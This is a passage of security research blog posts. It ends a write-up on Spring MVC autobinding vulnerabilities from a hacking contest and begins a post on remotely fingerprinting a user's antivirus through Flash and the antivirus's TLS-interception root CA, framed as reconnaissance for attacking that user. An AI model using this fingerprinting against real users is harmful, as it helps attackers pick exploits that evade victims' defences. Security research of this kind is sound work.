<span lang="EN-US" style="mso-ansi-language: EN-US;">Conclusion</span></div>
</span></h3>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">
</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">I've not
shown an example related to incorrect using of "@ModelAttribute on a
method", but something similar could happen in this case too.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">As you can
see, the main idea, <span style="mso-spacerun: yes;"> </span>is based on the fact
that a programmer thinks that he or she gets an object from a trusted place,
but in practice, the object can be modified by an attacker. </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">I'm not
sure, that I’ve correctly described causes of such a vuln, why and how Spring MVC behaves
in this way.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">It's hard
to say exactly how common this variation of autobinding vuln is (but it definitely
can be somewhere ;) . In general, autobinding vulns are pretty widespread,
because of the feature they are based on. Moreover, the autobinding is not just
about HTTP params, theoretically, any incoming data (e.g. JSON or XML) can be
converted and then populated. However, a possibility of exploitation and impact
strongly depend on many things ranging from using annotations and names of attributes
to business logic of an application.<span style="mso-spacerun: yes;"> </span></span></div>
<br />
Sources of the tasks - <a href="https://github.com/GrrrDog/ZeroNights-HackQuest-2016" target="_blank">https://github.com/GrrrDog/ZeroNights-HackQuest-2016</a><br />
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="MsoNormal" style="text-align: left;">
</div>
<br /></div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com1tag:blogger.com,1999:blog-8095956197947792822.post-57204397803921461202016-06-17T10:55:00.001-07:002016-06-18T02:26:45.392-07:00Remote detection of a user's AV using Flash<div dir="ltr" style="text-align: left;" trbidi="on">
<i>Attention, the method works not as well as it should </i><br />
<br />
There is a possibility to find out a vendor of AV installed on a user's PC. Remotely and without detection from the user. This information could be useful for us if we want to attack the user.<br />
The method is based on two main features.<br />
<br />
<b>The first feature.</b> The most of modern AVs can detect malware analyzing network traffic. Usually, http and smtp/pop3/imap protocols are analyzed. However, as TLS is used more and more often, then an AV actually has to perform a man in the middle attack against a user application and a remote server. To bypass a certificate chain check, the AV installs its own root CA (root CA's private key is stored too) to the OS and uses it for "on fly" certificate creation for intercepted TLS connections.<br />
<br />
<img alt="" src="data:image/png;base64,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